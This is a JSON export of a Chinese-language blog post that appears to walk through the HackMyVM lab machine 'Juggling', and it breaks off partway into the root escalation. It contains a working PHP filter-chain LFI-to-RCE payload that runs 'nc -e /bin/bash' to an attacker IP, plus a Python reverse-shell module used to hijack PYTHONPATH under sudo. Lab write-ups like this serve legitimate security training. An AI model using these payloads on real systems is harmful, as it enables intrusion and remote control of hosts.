{"id":756,"date":"2024-07-12T14:38:06","date_gmt":"2024-07-12T06:38:06","guid":{"rendered":"http:\/\/162.14.82.114\/?p=756"},"modified":"2024-07-12T14:38:06","modified_gmt":"2024-07-12T06:38:06","slug":"hmv-_-juggling","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/756\/07\/12\/2024\/","title":{"rendered":"hmv[-_-]juggling"},"content":{"rendered":"

Juggling<\/h1>\n

\"image-20240710135039282\"<\/div>
\n
\"image-20240712114156382\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/juggling]\n\u2514\u2500$ rustscan -a $IP -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83c\udf0dHACK THE PLANET\ud83c\udf0d\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.188:22\nOpen 192.168.0.188:80\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n|   3072 27:71:24:58:d3:7c:b3:8a:7b:32:49:d1:c8:0b:4c:ba (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCjRCpLEF00zJy\/GkOtP8umEO3vDUpsiovHmmmfKN5njf5d4aqXBW3wUjqVL3VotabyslG6gNZnaPODVt2z3MdHsyNBuJZrbRrN26Dmz3x6pzJPnizxq2AXGzfgL89jQi83yr72gb2FpxGXm8BqYTTXwbiF7NIi+ekTmRWBa6LUQHgirqggrUq5xdmj0lTu+lMQ2Tzy4xfL6BKgyg4IaZlO9Kz9Z02ghG6VDr2vV9aInO4gu\/i2nlvM+aErvWyREoqspjvhgPd0Q950AkOkKfjD5hHxLFZo7aR3PHJev+8zrKwsv\/6bUAQIl8nUYifu\/a+1vpSddyl37ikQNLY7RsCboBNtPryz7czF1UUtWMlICTHegrchZT3FEr+c5g51hEj+AkwwQoan2y8SCMhKIbWQQH0qBWNXnfNpKGS5y8Vn8s6KqZlsPq49\/k9Pmr0jplaqgKDrPuiddGOehu5Yh6Fg5jsk5c5zXttWY17TyJdeab1LBOBJMY2ur4ZnSh+zv7E=\n|   256 e2:30:67:38:7b:db:9a:86:21:01:3e:bf:0e:e7:4f:26 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOAIZW58yN\/LbK35zNnyYvo4vNm1bnBkyDn4KzLYYyGBG2owUbmMp8WcmKWxT5ImSPDUE24mlhafaDEb8smp1Mc=\n|   256 5d:78:c5:37:a8:58:dd:c4:b6:bd:ce:b5:ba:bf:53:dc (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB57U+4lDKyoTXGtTCBdDtmnL1YvIhNjQpbp\/tdjDYGx\n80\/tcp open  http    syn-ack nginx 1.18.0\n|_http-title: Did not follow redirect to http:\/\/juggling.hmv\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: nginx\/1.18.0\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u53ef\u4ee5\u6dfb\u52a0\u57df\u540d\u89e3\u6790\u4e86\uff1a<\/p>\n
192.168.0.188   juggling.hmv<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/juggling]\n\u2514\u2500$ gobuster dir -u http:\/\/juggling.hmv -q -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html \n\/images               (Status: 301) [Size: 169] [--> http:\/\/juggling.hmv\/images\/]\n\/index.php            (Status: 200) [Size: 2485]\n\/blog.php             (Status: 200) [Size: 0]\n\/admin.php            (Status: 302) [Size: 0] [--> index.php]\n\/css                  (Status: 301) [Size: 169] [--> http:\/\/juggling.hmv\/css\/]\n\/test.php             (Status: 200) [Size: 32]\n\/js                   (Status: 301) [Size: 169] [--> http:\/\/juggling.hmv\/js\/]\n\/logout.php           (Status: 302) [Size: 1] [--> index.php]<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\"image-20240712115533906\"<\/div><\/p>\n
\u662f\u4e00\u4e2a\u767b\u5f55\u754c\u9762\uff01\u67e5\u770b\u6e90\u4ee3\u7801\uff0c\u53d1\u73b0\u4e00\u5904\u7591\u4f3c\u5b58\u5728LFI<\/code>\u7684\u6587\u4ef6\u8def\u5f84\uff1a<\/p>\n
\"image-20240712115832183\"<\/div>
\n
\"image-20240712115909433\"<\/div><\/p>\n
\u67e5\u770b\u6e90\u4ee3\u7801\u4e5f\u6ca1\u5565\u4e1c\u897f\uff0c\u5c1d\u8bd5\u5305\u62ec\/etc\/passwd<\/code>\uff0c\u4f46\u662f\u90fd\u6ca1\u6709\u6536\u83b7\u3002<\/p>\n
LFI FUZZ<\/h3>\n
\u5c1d\u8bd5fuzz\u4e00\u4e0b\u662f\u5426\u7531\u6587\u4ef6\u53ef\u4ee5\u8fdb\u884c\u8bfb\u53d6\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/juggling]\n\u2514\u2500$ ffuf -u http:\/\/juggling.hmv\/blog.php?page=FUZZ -w \/usr\/share\/wordlists\/dirb\/common.txt --fw 1\n\n        \/'___\\  \/'___\\           \/'___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/juggling.hmv\/blog.php?page=FUZZ\n :: Wordlist         : FUZZ: \/usr\/share\/wordlists\/dirb\/common.txt\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response words: 1\n________________________________________________\n\nindex                   [Status: 200, Size: 2485, Words: 97, Lines: 76, Duration: 97ms]\nlogout                  [Status: 302, Size: 1, Words: 2, Lines: 1, Duration: 90ms]\ntest                    [Status: 200, Size: 32, Words: 7, Lines: 1, Duration: 96ms]\n:: Progress: [4614\/4614] :: Job [1\/1] :: 477 req\/sec :: Duration: [0:00:12] :: Errors: 0 ::<\/code><\/pre>\n
\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/juggling]\n\u2514\u2500$ curl http:\/\/juggling.hmv\/blog.php?page=index                                               \n<!DOCTYPE html>\n<html lang="en">\n <head> \n  <title>Juggling<\/title> \n  <meta charset="utf-8" \/> \n  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" \/> \n  <link href="https:\/\/fonts.googleapis.com\/css?family=Lato:300,400,700&display=swap" rel="stylesheet" \/> \n  <link rel="stylesheet" href="css\/font-awesome.min.css" \/> \n  <link rel="stylesheet" href="css\/style.css" \/> \n <\/head> \n <body> \n  <section class="ftco-section"> \n   <div class="container"> \n    <div class="row justify-content-center"> \n     <div class="col-md-6 text-center mb-5"> \n      <h2 class="heading-section">Juggling Login<\/h2> \n     <\/div> \n    <\/div> \n    <div class="row justify-content-center"> \n     <div class="col-md-12 col-lg-10"> \n      <div class="wrap d-md-flex"> \n       <video class="img" width="600" height="500" autoplay="" loop="" muted=""> \n        <source src="images\/juggle.mp4" type="video\/mp4"><\/source> \n       <\/video> \n       <div class="login-wrap p-4 p-md-5"> \n        <div class="d-flex"> \n         <div class="w-100"> \n          <h3 class="mb-5">Sign In<\/h3> \n         <\/div> \n        <\/div> \n        <form notaction="blog.php?page=test" class="signin-form" method="POST"> \n         <div class="form-group mb-2"> \n          <label class="label">Username<\/label> \n          <input type="text" name="username" class="form-control" placeholder="Username" required="" \/> \n         <\/div> \n         <div class="form-group mb-4"> \n          <label class="label">Password<\/label> \n          <input type="password" name="password" class="form-control" placeholder="Password" required="" pattern="(?=.*[a-z])(?=.*[A-Z])(?=.*[0-9]).{8,15}" \/> \n         <\/div> \n         <div class="container"> \n          <div class="row justify-content-md-center"> \n           <div class="col col-lg-5"> \n            <input type="text" name="val1" class="form-control" placeholder="Value 1" \/> \n           <\/div> \n           <div class="col col-lg-5"> \n            <input type="text" name="val2" class="form-control" placeholder="Value 2" \/> \n           <\/div> \n          <\/div> \n         <\/div> \n         <div class="mt-5"> \n          <button type="submit" name="submit" class="form-control btn btn-primary rounded submit">Sign In<\/button> \n         <\/div> \n        <\/form> \n       <\/div> \n      <\/div> \n     <\/div> \n    <\/div> \n   <\/div> \n  <\/section> \n  <script src="js\/jquery.min.js"><\/script> \n  <script src="js\/popper.js"><\/script> \n  <script src="js\/bootstrap.min.js"><\/script> \n  <script src="js\/main.js"><\/script>  \n <\/body>\n<\/html><\/code><\/pre>\n
\u770b\u4e00\u4e0bfilter<\/code>\u662f\u5426\u53ef\u4ee5\u8fdb\u884c\u8bfb\u53d6\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/juggling]\n\u2514\u2500$ curl http:\/\/juggling.hmv\/blog.php?page=php:\/\/filter\/read=convert.base64-encode\/resource=index\nPD9waHAKCXNlc3Npb25fc3RhcnQoKTsKCXJlcXVpcmVfb25jZSgic3FsZGJfY29uZmlnLnBocCIpOwoKCWlmKGlzc2V0KCRfU0VTU0lPTlsndXNlcm5hbWUnXSkpIHsKICAgICAgICAJaGVhZGVyKCJMb2NhdGlvbjogYWRtaW4ucGhwIik7CiAgICAgICAgCWRpZSgpOwogICAgCX0KCglpZiAoaXNzZXQoJF9QT1NUWydzdWJtaXQnXSkpIHsKCQkkdXNlcm5hbWUgPSAkX1BPU1RbJ3VzZXJuYW1lJ107CgkJJHBhc3N3b3JkID0gJF9QT1NUWydwYXNzd29yZCddOwoJCSR2YWwxID0gJF9QT1NUWyd2YWwxJ107CgkJJHZhbDIgPSAkX1BPU1RbJ3ZhbDInXTsKCgkJJG1hZ2ljdmFsID0gc3RyY2FzZWNtcCgkdmFsMSwkdmFsMik7CgkJJGtleSA9IG1kNSgiJHVzZXJuYW1lIi4kcGFzc3dvcmQpOwoJCWlmIChlbXB0eSgkdmFsKSAmJiBlbXB0eSgkdmFsMikpIHsKCQkJZWNobyAnPGJyPjxoMSBzdHlsZT0idGV4dC1hbGlnbjpjZW50ZXI7Y29sb3I6cmVkOyI+IFZhbHVlIDEgYW5kIFZhbHVlMiBjYW5cJ3QgYmUgRW1wdHkgPC9oMT4nOwoJCQloZWFkZXIoIlJlZnJlc2g6MyIpOwoJCX0gZWxzZSB7CgkJCWlmICgkdmFsMSA9PT0gJHZhbDIpIHsKCQkJCWVjaG8gJzxicj48aDEgc3R5bGU9InRleHQtYWxpZ246Y2VudGVyO2NvbG9yOnJlZDsiPiBWYWx1ZSAxIGFuZCBWYWx1ZTIgY2FuXCd0IGJlIFNhbWUgPC9oMT4nOwoJCQkJaGVhZGVyKCJSZWZyZXNoOjMiKTsKCQkJfSBlbHNlIHsKCQkJCWlmICgka2V5ID09IG51bWJlcl9mb3JtYXQoJG1hZ2ljdmFsICogMTMzNykpIHsKCQkJCQkkX1NFU1NJT05bJ3VzZXJuYW1lJ10gPSAicnlhbiI7CgkJCQkJaGVhZGVyKCJMb2NhdGlvbjogYWRtaW4ucGhwIik7IGRpZSgpOwoJCQkJCSMgaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3MzY3VyMy5qdWdnbGluZy5obXYvaW5kZXgucGhwIik7CgkJCQkJaGVhZGVyKCJMb2NhdGlvbjogLi4vczNjdXIzL2luZGV4LnBocCIpOwoJCQkJfSBlbHNlIHsKCQkJCQloZWFkZXIoIlJlZnJlc2g6MyIpOwoJCQkJfQoJCQl9CgkJfQoJfQo\/Pgo8IWRvY3R5cGUgaHRtbD4KPGh0bWwgbGFuZz0iZW4iPgoJPGhlYWQ+CgkJPHRpdGxlPkp1Z2dsaW5nPC90aXRsZT4KCQk8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CgkJPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLCBzaHJpbmstdG8tZml0PW5vIj4KCgkJPGxpbmsgaHJlZj0iaHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3M\/ZmFtaWx5PUxhdG86MzAwLDQwMCw3MDAmZGlzcGxheT1zd2FwIiByZWw9InN0eWxlc2hlZXQiPgoJCTxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iY3NzL2ZvbnQtYXdlc29tZS5taW4uY3NzIj4KCQk8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9ImNzcy9zdHlsZS5jc3MiPgoJPC9oZWFkPgoKCTxib2R5PgoJCTxzZWN0aW9uIGNsYXNzPSJmdGNvLXNlY3Rpb24iPgoJCQk8ZGl2IGNsYXNzPSJjb250YWluZXIiPgoJCQkJPGRpdiBjbGFzcz0icm93IGp1c3RpZnktY29udGVudC1jZW50ZXIiPgoJCQkJCTxkaXYgY2xhc3M9ImNvbC1tZC02IHRleHQtY2VudGVyIG1iLTUiPgoJCQkJCQk8aDIgY2xhc3M9ImhlYWRpbmctc2VjdGlvbiI+SnVnZ2xpbmcgTG9naW48L2gyPgoJCQkJCTwvZGl2PgoJCQkJPC9kaXY+CgoJCQkJPGRpdiBjbGFzcz0icm93IGp1c3RpZnktY29udGVudC1jZW50ZXIiPgoJCQkJCTxkaXYgY2xhc3M9ImNvbC1tZC0xMiBjb2wtbGctMTAiPgoJCQkJCQk8ZGl2IGNsYXNzPSJ3cmFwIGQtbWQtZmxleCI+CgkJCQkJCQk8dmlkZW8gY2xhc3M9ImltZyIgd2lkdGg9IjYwMCIgaGVpZ2h0PSI1MDAiIGF1dG9wbGF5IGxvb3AgbXV0ZWQ+CgkJCQkJCQkJPHNvdXJjZSBzcmM9ImltYWdlcy9qdWdnbGUubXA0IiB0eXBlPSJ2aWRlby9tcDQiIC8+CgkJCQkJCQk8L3ZpZGVvPgoJCQkJCQkJPGRpdiBjbGFzcz0ibG9naW4td3JhcCBwLTQgcC1tZC01Ij4KCQkJCQkJCQk8ZGl2IGNsYXNzPSJkLWZsZXgiPgoJCQkJCQkJCQk8ZGl2IGNsYXNzPSJ3LTEwMCI+CgkJCQkJCQkJCQk8aDMgY2xhc3M9Im1iLTUiPlNpZ24gSW48L2gzPgoJCQkJCQkJCQk8L2Rpdj4KCQkJCQkJCQk8L2Rpdj4KCQkJCQkJCQkKCQkJCQkJCQk8Zm9ybSBub3RhY3Rpb249ImJsb2cucGhwP3BhZ2U9dGVzdCIgY2xhc3M9InNpZ25pbi1mb3JtIiBtZXRob2Q9IlBPU1QiPgoJCQkJCQkJCQk8ZGl2IGNsYXNzPSJmb3JtLWdyb3VwIG1iLTIiPgoJCQkJCQkJCQkJPGxhYmVsIGNsYXNzPSJsYWJlbCI+VXNlcm5hbWU8L2xhYmVsPgoJCQkJCQkJCQkJPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InVzZXJuYW1lIiBjbGFzcz0iZm9ybS1jb250cm9sIiBwbGFjZWhvbGRlcj0iVXNlcm5hbWUiIHJlcXVpcmVkPgoJCQkJCQkJCQk8L2Rpdj4KCQkJCQkJCQkJCgkJCQkJCQkJCTxkaXYgY2xhc3M9ImZvcm0tZ3JvdXAgbWItNCI+CgkJCQkJCQkJCQk8bGFiZWwgY2xhc3M9ImxhYmVsIj5QYXNzd29yZDwvbGFiZWw+CgkJCQkJCQkJCQk8aW5wdXQgdHlwZT0icGFzc3dvcmQiIG5hbWU9InBhc3N3b3JkIiBjbGFzcz0iZm9ybS1jb250cm9sIiBwbGFjZWhvbGRlcj0iUGFzc3dvcmQiIHJlcXVpcmVkIHBhdHRlcm49Iig\/PS4qW2Etel0pKD89LipbQS1aXSkoPz0uKlswLTldKS57OCwxNX0iPgoJCQkJCQkJCQk8L2Rpdj4KCQkJCQkJCQkJCgkJCQkJCQkJCTxkaXYgY2xhc3M9ImNvbnRhaW5lciI+CiAgCQkJCQkJCQkJCTxkaXYgY2xhc3M9InJvdyBqdXN0aWZ5LWNvbnRlbnQtbWQtY2VudGVyIj4KCQkJCQkJCQkJCQk8ZGl2IGNsYXNzPSJjb2wgY29sLWxnLTUiPgoJCQkJCQkJCQkJCQk8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0idmFsMSIgY2xhc3M9ImZvcm0tY29udHJvbCIgcGxhY2Vob2xkZXI9IlZhbHVlIDEiPgoJCQkJCQkJCQkJCTwvZGl2PgoKCQkJCQkJCQkJCQk8ZGl2IGNsYXNzPSJjb2wgY29sLWxnLTUiPgoJCQkJCQkJCQkJCQk8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0idmFsMiIgY2xhc3M9ImZvcm0tY29udHJvbCIgcGxhY2Vob2xkZXI9IlZhbHVlIDIiPgoJCQkJCQkJCQkJCTwvZGl2PgoJCQkJCQkJCQkJPC9kaXY+CgkJCQkJCQkJCTwvZGl2PgoKCQkJCQkJCQkJPGRpdiBjbGFzcz0ibXQtNSI+CgkJCQkJCQkJCQk8YnV0dG9uIHR5cGU9InN1Ym1pdCIgbmFtZT0ic3VibWl0IiBjbGFzcz0iZm9ybS1jb250cm9sIGJ0biBidG4tcHJpbWFyeSByb3VuZGVkIHN1Ym1pdCI+U2lnbiBJbjwvYnV0dG9uPgoJCQkJCQkJCQk8L2Rpdj4KCQkJCQkJCQk8L2Zvcm0+CgkJCQkJCQk8L2Rpdj4KCQkJCQkJPC9kaXY+CgkJCQkJPC9kaXY+CgkJCQk8L2Rpdj4KCQkJPC9kaXY+CgkJPC9zZWN0aW9uPgoKCQk8c2NyaXB0IHNyYz0ianMvanF1ZXJ5Lm1pbi5qcyI+PC9zY3JpcHQ+CgkJPHNjcmlwdCBzcmM9ImpzL3BvcHBlci5qcyI+PC9zY3JpcHQ+CgkJPHNjcmlwdCBzcmM9ImpzL2Jvb3RzdHJhcC5taW4uanMiPjwvc2NyaXB0PgoJCTxzY3JpcHQgc3JjPSJqcy9tYWluLmpzIj48L3NjcmlwdD4KCTwvYm9keT4KPC9odG1sPgo= <\/code><\/pre>\n
\u53d1\u73b0\u53ef\u4ee5\u8fdb\u884c\u8bfb\u53d6\uff0c\u5c1d\u8bd5\u6784\u9020php\u7684filter\u5229\u7528\u94fe\u770b\u770b\u80fd\u4e0d\u80fd\u53cd\u5f39shell\uff01<\/p>\n
\"image-20240712121615801\"<\/div><\/p>\n
http:\/\/juggling.hmv\/blog.php?page=php:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp&0=nc%20-e%20\/bin\/bash%20192.168.0.143%201234<\/code><\/pre>\n
\"image-20240712121756856\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
(remote) www-data@juggling:\/var\/www\/juggling$ sudo -l\nMatching Defaults entries for www-data on juggling:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser www-data may run the following commands on juggling:\n    (rehan) SETENV: NOPASSWD: \/opt\/md5.py\n(remote) www-data@juggling:\/var\/www\/juggling$ cat \/opt\/md5.py\n#!\/usr\/bin\/python3\n\nimport hashlib\n\nresult = hashlib.md5("Hello World".encode()).hexdigest()\nprint(f"md5sum: {result}")\n(remote) www-data@juggling:\/var\/www\/juggling$ ls -la \/opt\/md5.py\n-rwxr-xr-x 1 root root 120 Jul 10  2022 \/opt\/md5.py\n(remote) www-data@juggling:\/var\/www\/juggling$ cd \/home\/rehan\/\nbash: cd: \/home\/rehan\/: Permission denied\n(remote) www-data@juggling:\/var\/www\/juggling$ cat \/etc\/passwd | grep 'sh'\nroot:x:0:0:root:\/root:\/bin\/bash\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nrehan:x:1001:1001::\/home\/rehan:\/bin\/bash\n(remote) www-data@juggling:\/var\/www\/juggling$ python3 \/opt\/md5.py \nmd5sum: b10a8db164e0754105b7a99be72e3fe5\n(remote) www-data@juggling:\/var\/www\/juggling$ find \/ -name *hashlib* 2>\/dev\/null\n\/usr\/lib\/python3.9\/hashlib.py\n\/usr\/lib\/python3.9\/lib-dynload\/_hashlib.cpython-39-x86_64-linux-gnu.so\n\/usr\/lib\/python3.9\/__pycache__\/hashlib.cpython-39.pyc\n\/usr\/lib\/python3.9\/test\/support\/__pycache__\/hashlib_helper.cpython-39.pyc\n\/usr\/lib\/python3.9\/test\/support\/hashlib_helper.py\n(remote) www-data@juggling:\/var\/www\/juggling$ ls -la \/usr\/lib\/python3.9\/hashlib.py\n-rw-r--r-- 1 root root 10010 Feb 28  2021 \/usr\/lib\/python3.9\/hashlib.py<\/code><\/pre>\n
\u8def\u5f84\u52ab\u6301\u63d0\u6743\u7528\u6237<\/h3>\n
\u4ed4\u7ec6\u770b\u6211\u4eec\u662f\u53ef\u4ee5\u914d\u7f6e\u8def\u5f84\u53d8\u91cf\u7684\uff0c\u53c2\u8003\uff1ahttps:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation#setenv<\/a><\/p>\n
\u5199\u4e00\u4e2a\u53cd\u5f39shell\u7684hashlib<\/code>\u5305\uff0c\u4e22\u5728\/tmp<\/code>\uff0c\u7136\u540e\u5c1d\u8bd5\u52ab\u6301\uff1a<\/p>\n
import socket, subprocess, os;\nimport pty;\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM);\ns.connect(("192.168.0.143", 2345));\nos.dup2(s.fileno(), 0);\nos.dup2(s.fileno(), 1);\nos.dup2(s.fileno(), 2);\npty.spawn("bash")<\/code><\/pre>\n
\u914d\u7f6e\u76d1\u542c\u7136\u540e\u5c1d\u8bd5\u6267\u884c\uff1a<\/p>\n
(remote) www-data@juggling:\/tmp$ sudo -u rehan PYTHONPATH=\/tmp\/ \/opt\/md5.py<\/code><\/pre>\n
\"image-20240712123231322\"<\/div><\/p>\n
\u63d0\u6743root<\/h3>\n
\u4fe1\u606f\u641c\u96c6<\/h4>\n
(remote) rehan@juggling:\/tmp$ cd ~\n(remote) rehan@juggling:\/home\/rehan$ ls -la\ntotal 20\ndrwxr-x--- 2 rehan rehan 4096 Jul 10  2022 .\ndrwxr-xr-x 3 root  root  4096 Jul  9  2022 ..\nlrwxrwxrwx 1 root  root     9 Jul 10  2022 .bash_history -> \/dev\/null\n-rw-r--r-- 1 rehan rehan 3526 Aug  4  2021 .bashrc\n-rw-r--r-- 1 rehan rehan  807 Aug  4  2021 .profile\n-r-------- 1 rehan rehan   33 Jul  9  2022 user.txt\n(remote) rehan@juggling:\/home\/rehan$ cat user.txt \nde0a7d9cb0e1ae6190e85549f63a26c1\n(remote) rehan@juggling:\/home\/rehan$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for rehan: \nsudo: a password is required\n(remote) rehan@juggling:\/home\/rehan$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/pkexec\n\/usr\/bin\/gpasswd\n\/usr\/bin\/sudo\n\/usr\/bin\/passwd\n\/usr\/bin\/umount\n\/usr\/bin\/chsh\n\/usr\/bin\/su\n\/usr\/bin\/chfn\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/libexec\/polkit-agent-helper-1\n(remote) rehan@juggling:\/home\/rehan$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping cap_net_raw=ep\n\/usr\/lib\/x86_64-linux-gnu\/gstreamer1.0\/gstreamer-1.0\/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep\n\/usr\/local\/bin\/register cap_dac_override=ep<\/code><\/pre>\n
\u53d1\u73b0\u4e00\u4e2a\u5947\u602a\u7684Capabilities<\/code>\u6587\u4ef6\uff0c\u5176\u53ef\u4ee5\u5bf9\u6587\u4ef6\u8fdb\u884c\u8986\u5199\uff1a<\/p>\n
